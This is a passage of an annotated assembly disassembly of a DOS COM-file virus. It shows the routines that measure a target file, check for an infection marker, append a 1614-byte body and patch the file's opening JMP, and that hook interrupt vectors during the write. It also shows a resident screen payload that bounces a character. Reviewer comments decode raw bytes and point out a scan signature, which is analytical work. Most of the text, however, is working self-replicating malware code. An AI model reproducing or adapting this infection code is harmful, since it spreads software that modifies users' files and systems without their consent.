LES DI,DWORD PTR [SI+14H]
MOV DS:DATA_9E,DI
MOV DS:DATA_10E,ES
MOV [SI+14H],DX ; Tie up some memory!
MOV [SI+16H],AX ; release it on next execution
MOV DS:DATA_11E,AX ; Jump to su routine to do
MOV AX,4202H ; this and disable interrups
XOR CX,CX
XOR DX,DX
CALL SUB_5
CALL SUB_3
JC LOC_RET_19
MOV AX,4200H
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
MOV AH,40H
MOV DX,SI
MOV CX,18H
CALL SUB_5
LOC_RET_19:
RETN
SUB_1 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;-----------------------------------------------------------------------
; SUB_2: split a 32-bit value DX:AX into 16-byte paragraphs + remainder.
; In:  DX:AX = 32-bit value (e.g. a byte count)
; Out: AX = low word of (DX:AX >> 4)   -- paragraph count
;      DX = original AX & 0Fh          -- remainder inside the paragraph
; Clobbers: CX, DI, flags. The high bits of the shifted DX are discarded.
;-----------------------------------------------------------------------
SUB_2 PROC NEAR
MOV CX,4 ; four 1-bit shifts of the 32-bit pair = divide by 16
MOV DI,AX
AND DI,0FH ; keep the low nibble (remainder) before it is shifted out
LOCLOOP_20:
SHR DX,1 ; Shift w/zeros fill; DX bit 0 lands in CF
RCR AX,1 ; Rotate thru carry: CF enters AX bit 15, so DX:AX shifts right as one unit
LOOP LOCLOOP_20 ; Loop if cx > 0
MOV DX,DI ; DX = remainder
RETN
SUB_2 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;-----------------------------------------------------------------------
; SUB_3: write the 64Eh-byte body located at DS:100h to the open file.
; In:  DS:100h = buffer to write (the COM load address)
;      BX = file handle -- assumed set by the caller; not visible here
; Out: CF/AX as left by the DOS write (CF=1 on error)
; Clobbers: AX, CX, DX
; Flow: SUB_6 swaps two vectors in segment 0 first, then control jumps
; into SUB_5 (LOC_24), whose RETN returns straight to SUB_3's caller.
; SUB_6 is NOT undone here; SUB_7 must be called separately.
;-----------------------------------------------------------------------
SUB_3 PROC NEAR
MOV AH,40H ; DOS: write to handle
MOV CX,64EH ; byte count = body length (1614 bytes)
MOV DX,100H ; DS:DX = buffer
CALL SUB_6 ; redirect two vectors for the duration of the write (see SUB_6)
JMP SHORT LOC_24 ; tail-jump into SUB_5: PUSHF / far CALL / RETN
DB 90H ; NOP pad; never executed (the JMP above skips it)
;*-*- External Entry into Subroutine -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
; SUB_4: append the body to the open COM file and patch its entry.
; In:  DS:SI = buffer holding the first bytes of the file (filled by the
;      caller, outside this listing); BX = handle (assumed)
; Out: CF=1 if the file already carries the marker (nothing written);
;      otherwise CF from the last DOS write. Returns with no change when
;      the size is outside [64Eh, 0FA00h). Only the low word of the size
;      (AX) is tested -- DX from the lseek is ignored.
; Marker checked/written: byte 0 = E9h (JMP rel16) and the rel16 at
; bytes 1-2 = size - 651h, which makes the JMP land on the appended body
; (103h + size - 651h = 100h + size - 64Eh). Useful as a scan signature.
SUB_4:
MOV AX,4202H ; DOS lseek from end, offset CX:DX = 0 -> DX:AX = file size
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
CMP AX,64EH
JB LOC_RET_23 ; Jump if below: file smaller than the body -> leave it alone
CMP AX,0FA00H
JAE LOC_RET_23 ; Jump if above or =: result would exceed the COM size limit -> skip
PUSH AX ; preserve the original size across the checks
CMP BYTE PTR [SI],0E9H ; first byte already a JMP rel16?
JNE LOC_21 ; Jump if not equal
SUB AX,651H ; rel16 a previously appended body would have
CMP AX,[SI+1]
JNE LOC_21 ; Jump if not equal
POP AX
STC ; Set carry flag: marker present, signal "skip" to the caller
RETN
LOC_21:
CALL SUB_3 ; file pointer is at EOF, so this appends the body
JNC LOC_22 ; Jump if carry=0: write succeeded
POP AX
RETN ; CF=1 from the failed write propagates to the caller
LOC_22:
MOV AX,4200H ; DOS lseek from start, offset 0
XOR CX,CX ; Zero register
XOR DX,DX ; Zero register
CALL SUB_5
POP AX ; original size
SUB AX,3 ; rel16 so a JMP at 100h lands on 100h+size, i.e. the appended body
MOV DX,122H
MOV SI,DX ; build the 3-byte patch at CS:122h
MOV BYTE PTR CS:[SI],0E9H ; JMP rel16 opcode
MOV CS:[SI+1],AX
MOV AH,40H ; DOS: write 3 bytes from DS:DX over the file's first bytes
MOV CX,3 ; NOTE: patch is built via CS: but written from DS:DX -- relies on DS == CS
CALL SUB_5
LOC_RET_23:
RETN
SUB_3 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;-----------------------------------------------------------------------
; SUB_5 (LOC_24 is also reached by a JMP from SUB_3): invoke the handler
; whose address is stored at CS:DATA_28, pushing the flags first so the
; handler's IRET balances the stack -- the usual way to call an interrupt
; routine directly instead of through INT.
; Every DOS request in this listing (AH=40h writes, AX=42xxh seeks) goes
; through here, so DATA_28 is presumably a saved INT 21h vector; its
; definition and value are not in this listing. For PUSHF/IRET to
; balance, the CALL must be far (DATA_28 declared DD) -- confirm.
; Out: registers/flags as left by the handler (CF=1 on DOS error).
;-----------------------------------------------------------------------
SUB_5 PROC NEAR
LOC_24:
PUSHF ; Push flags: the callee's IRET pops them again
CALL CS:DATA_28 ; call through the stored vector
RETN
SUB_5 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;-----------------------------------------------------------------------
; SUB_6: save and replace two far pointers in segment 0 (presumably
; interrupt vectors; the interrupt table lives at 0000:0000-03FFh) for
; the duration of the file write. SUB_7 restores them.
;   0000:DATA_5E -> saved in CS:DATA_29/DATA_30, then set to CS:046Ah
;   0000:DATA_1E -> saved in CS:DATA_32/DATA_33, then set to the far
;                   pointer stored at CS:DATA_31
; Which interrupt numbers DATA_5E/DATA_1E denote (offset/4) cannot be
; read off this listing. CS:046Ah is where the undecoded DB block after
; SUB_7 begins (MOV AL,3 / IRET) -- a 3-byte stub of that shape is the
; form of a critical-error handler answering "fail"; treat as inference.
; CLI/STI make the two-word vector stores atomic w.r.t. interrupts.
; Preserves: AX, DS, ES (pushed/popped). Clobbers: flags.
; NOTE(review): the original annotation ("copies the virus to the COM
; file") is misleading -- no file data moves here, only pointers.
;-----------------------------------------------------------------------
SUB_6 PROC NEAR
PUSH AX
PUSH DS
PUSH ES
XOR AX,AX ; Zero register
PUSH AX
POP DS ; DS = 0
CLI ; Disable the interrupts
LES AX,DWORD PTR DS:DATA_5E ; ES:AX = current pointer at 0000:DATA_5E
MOV CS:DATA_29,AX ; save it (offset)
MOV CS:DATA_30,ES ; save it (segment)
MOV AX,46AH
MOV DS:DATA_5E,AX ; point it at CS:046Ah (the MOV AL,3 / IRET stub)
MOV WORD PTR DS:DATA_5E+2,CS
LES AX,DWORD PTR DS:DATA_1E ; ES:AX = current pointer at 0000:DATA_1E
MOV CS:DATA_32,AX ; save it (offset)
MOV CS:DATA_33,ES ; save it (segment)
LES AX,CS:DATA_31 ; ES:AX = replacement pointer kept at CS:DATA_31 (value not in listing)
MOV DS:DATA_1E,AX
MOV WORD PTR DS:DATA_1E+2,ES
STI ; Enable the interrupts
POP ES ; and restore registers
POP DS
POP AX
RETN
SUB_6 ENDP
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;-----------------------------------------------------------------------
; SUB_7: inverse of SUB_6 -- put the two far pointers in segment 0 back
; to the values SUB_6 saved:
;   0000:DATA_5E <- CS:DATA_29/DATA_30
;   0000:DATA_1E <- CS:DATA_32/DATA_33
; Must only run after SUB_6 (otherwise DATA_29/DATA_32 are stale).
; Preserves: AX, DS, ES. Clobbers: flags.
; NOTE(review): the original annotation ("copy yourself to the EXE") is
; wrong -- nothing is copied to any file here.
;-----------------------------------------------------------------------
SUB_7 PROC NEAR
PUSH AX
PUSH DS
PUSH ES
XOR AX,AX ; Zero register
PUSH AX
POP DS ; DS = 0
CLI ; Disable interrupts
LES AX,DWORD PTR CS:DATA_29 ; ES:AX = pointer saved by SUB_6
MOV DS:DATA_5E,AX ; restore 0000:DATA_5E
MOV WORD PTR DS:DATA_5E+2,ES
LES AX,DWORD PTR CS:DATA_32 ; ES:AX = second pointer saved by SUB_6
MOV DS:DATA_1E,AX ; restore 0000:DATA_1E
MOV WORD PTR DS:DATA_1E+2,ES
STI ; Enable interrupts
POP ES
POP DS
POP AX
RETN
SUB_7 ENDP
; Bytes the disassembler left undecoded. Taking DATA_37 at CS:04C7h (per
; the annotations in the routine below) and counting back, this block
; starts at CS:046Ah -- the offset SUB_6 installs into 0000:DATA_5E.
; Reviewer's decoding (verify with a second disassembly):
;   046A: MOV AL,3 / IRET              -- 3-byte stub, see SUB_6
;   046D: PUSH AX,BX,CX,DX,SI,DI,BP,DS,ES; XOR AX,AX; PUSH AX; POP DS (DS=0)
;         MOV BH,[0462h]               -- BIOS data: active video page
;         MOV AX,[0450h]; MOV CS:[04CEh],AX   -- save page-0 cursor position
;         MOV AX,CS:[04C7h]; MOV [0450h],AX   -- cursor := DATA_37
;         MOV AX,CS:[04C5h]; MOV BL,AH; MOV AH,9; MOV CX,1; INT 10h
;                                      -- redraw the cell saved in DATA_36
;         CALL +34h (-> 04D0h, the movement code) ; CALL +0B7h (-> SUB_8)
;         MOV AX,CS:[04C7h]; MOV [0450h],AX   -- cursor := new DATA_37
;         MOV BL,2; MOV AX,0902h; MOV CX,1; INT 10h  -- draw char 02h, attr 2
;         MOV AX,CS:[04CEh]; MOV [0450h],AX   -- restore cursor
;         POP ES,DS,BP,DI,SI,DX,CX,BX,AX; JMP FAR CS:[04CAh] (DATA_40)
; i.e. a resident handler that animates one character on the text screen
; and chains to the previous vector. The interrupt it is attached to is
; not determinable from this listing.
DB 0B0H, 3, 0CFH, 50H, 53H, 51H ; MOV AL,3 / IRET ; PUSH AX,BX,CX
DB 52H, 56H, 57H, 55H, 1EH, 6 ; PUSH DX,SI,DI,BP,DS,ES
DB 33H, 0C0H, 50H, 1FH, 8AH, 3EH ; XOR AX,AX / PUSH AX / POP DS / MOV BH,[...
DB 62H, 4, 0A1H, 50H, 4, 2EH ; ...0462h] / MOV AX,[0450h] / CS:
DB 0A3H, 0CEH, 4, 2EH, 0A1H, 0C7H ; MOV CS:[04CEh],AX / MOV AX,CS:[04C7h]...
DB 4, 0A3H, 50H, 4, 2EH, 0A1H ; / MOV [0450h],AX / MOV AX,CS:[...
DB 0C5H, 4, 8AH, 0DCH, 0B4H, 9 ; ...04C5h] / MOV BL,AH / MOV AH,9
DB 0B9H, 1, 0, 0CDH, 10H, 0E8H ; MOV CX,1 / INT 10h / CALL ...
DB 34H, 0, 0E8H, 0B7H, 0, 2EH ; ...+34h / CALL +0B7h / CS:
DB 0A1H, 0C7H, 4, 0A3H, 50H, 4 ; MOV AX,CS:[04C7h] / MOV [0450h],AX
DB 0B3H, 2, 0B8H, 2, 9, 0B9H ; MOV BL,2 / MOV AX,0902h / MOV CX,...
DB 1, 0, 0CDH, 10H, 2EH, 0A1H ; ...1 / INT 10h / MOV AX,CS:[...
DB 0CEH, 4, 0A3H, 50H, 4, 7 ; ...04CEh] / MOV [0450h],AX / POP ES
DB 1FH ; POP DS
DB ']_^ZY[X.' ; POP BP,DI,SI,DX,CX,BX,AX ; 2Eh = CS: prefix of the next JMP
DB 0FFH, 2EH, 0CAH, 4 ; JMP FAR CS:[04CAh] = DATA_40 (chain to previous vector)
DATA_36 DW 0 ; cell under the moving glyph: low byte = char, high byte = attribute (written by SUB_8)
DATA_37 DW 1010H ; glyph position: low byte = column, high byte = row (starts at 16,16)
DATA_39 DB 0 ; direction flags: bit0 = column increasing, bit1 = row increasing
DATA_40 DD 706A0000H ; far pointer the handler chains to; 706A:0000 is a dump-time value (presumably the vector saved when hooked)
; 04CEh: saved cursor position word (the two zero bytes below); then
; 04D0h: start of the movement routine that LOC_25 continues --
;   MOV AX,CS:[04C7h]          -- AL = column, AH = row
;   MOV BX,[044Ah]; DEC BX     -- BIOS data: screen columns - 1
;   TEST BYTE CS:[04C9h],1; JZ LOC_25
;   CMP AL,BL; JB LOC_26       -- moving right and not at the right edge
;   XOR BYTE CS:[04C9h],1; JMP LOC_26   -- at the edge: reverse horizontal
DB 0, 0, 2EH, 0A1H, 0C7H, 4 ; DW 0 (saved cursor) ; MOV AX,CS:[04C7h]
DB 8BH, 1EH, 4AH, 4, 4BH, 2EH ; MOV BX,[044Ah] / DEC BX / CS:
DB 0F6H, 6, 0C9H, 4, 1, 74H ; TEST BYTE CS:[04C9h],1 / JZ ...
DB 0CH, 3AH, 0C3H, 72H, 12H, 2EH ; ...+0Ch (LOC_25) / CMP AL,BL / JB +12h (LOC_26) / CS:
DB 80H, 36H, 0C9H, 4, 1, 0EBH ; XOR BYTE CS:[04C9h],1 / JMP ...
DB 0AH ; ...+0Ah (LOC_26)
;-----------------------------------------------------------------------
; Movement routine (continuation; its first instructions are the
; undecoded bytes just above, which load AL = column / AH = row from
; DATA_37, BL = screen columns - 1, and handle the right screen edge).
; Bounces the glyph position in DATA_37 inside the screen: DATA_39 bit0
; is the horizontal direction, bit1 the vertical one. A direction bit is
; flipped at column 0, at row 0 / row 18h (24), and when the cell the
; glyph is about to occupy (DATA_36, read by SUB_8) is not a blank and
; the row is not 0. Finally the position is stepped by one in each axis.
; Clobbers: flags; modifies CS:DATA_37 and CS:DATA_39.
;-----------------------------------------------------------------------
LOC_25:
CMP AL,0
JG LOC_26 ; Jump if > : column > 0 (signed compare), keep moving left
XOR CS:DATA_39,1 ; at the left edge: reverse horizontal direction
LOC_26:
TEST CS:DATA_39,2
JZ LOC_27 ; Jump if zero: moving up
CMP AH,18H
JB LOC_28 ; Jump if below: row < 24, keep moving down
XOR CS:DATA_39,2 ; bottom edge: reverse vertical direction
JMP SHORT LOC_28
LOC_27:
CMP AH,0
JG LOC_28 ; Jump if > : row > 0, keep moving up
XOR CS:DATA_39,2 ; top edge: reverse vertical direction
LOC_28:
CMP BYTE PTR CS:DATA_36,20H ; character under the glyph a space?
JE LOC_29 ; Jump if equal
CMP BYTE PTR CS:DATA_37+1,0 ; on row 0?
JE LOC_29 ; Jump if equal
XOR CS:DATA_39,2 ; non-blank cell below row 0: reverse vertical direction
LOC_29:
TEST CS:DATA_39,1
JZ LOC_30 ; Jump if zero
INC BYTE PTR CS:DATA_37 ; column += 1
JMP SHORT LOC_31
LOC_30:
DEC BYTE PTR CS:DATA_37 ; column -= 1 (706A:04C7=10H)
LOC_31:
TEST CS:DATA_39,2 ; (706A:04C9=0)
JZ LOC_32 ; Jump if zero
INC BYTE PTR CS:DATA_37+1 ; row += 1 (706A:04C8=10H)
JMP SHORT LOC_RET_33 ; (0555)
LOC_32:
DEC BYTE PTR CS:DATA_37+1 ; row -= 1 (706A:04C8=10H)
LOC_RET_33:
RETN
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;*- SUBROUTINE *-
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
;-----------------------------------------------------------------------
; SUB_8: sample the screen cell at the glyph position.
; Stores DATA_37 (column/row) at DS:DATA_12E, loads BH from DS:DATA_13E
; and issues BIOS INT 10h AH=08h (read character and attribute at the
; cursor on page BH); the result AL=char / AH=attribute is kept in
; CS:DATA_36 so the cell can be redrawn after the glyph moves on.
; NOTE(review): DS is whatever the caller left; the resident handler
; above sets DS=0, where 0450h is the cursor position and 0462h the
; active page -- DATA_12E/DATA_13E are presumably those offsets; confirm.
; Clobbers: AX, BH, flags.
;-----------------------------------------------------------------------
SUB_8 PROC NEAR
MOV AX,CS:DATA_37
MOV DS:DATA_12E,AX ; cursor position := glyph position (see note above)
MOV BH,DS:DATA_13E ; BH = video page for the BIOS call
MOV AH,8
INT 10H ; BIOS: read char+attr at cursor -> AL=char, AH=attribute
; (the call only reads the cell; the cursor was already moved by the store above)
MOV CS:DATA_36,AX
RETN
SUB_8 ENDP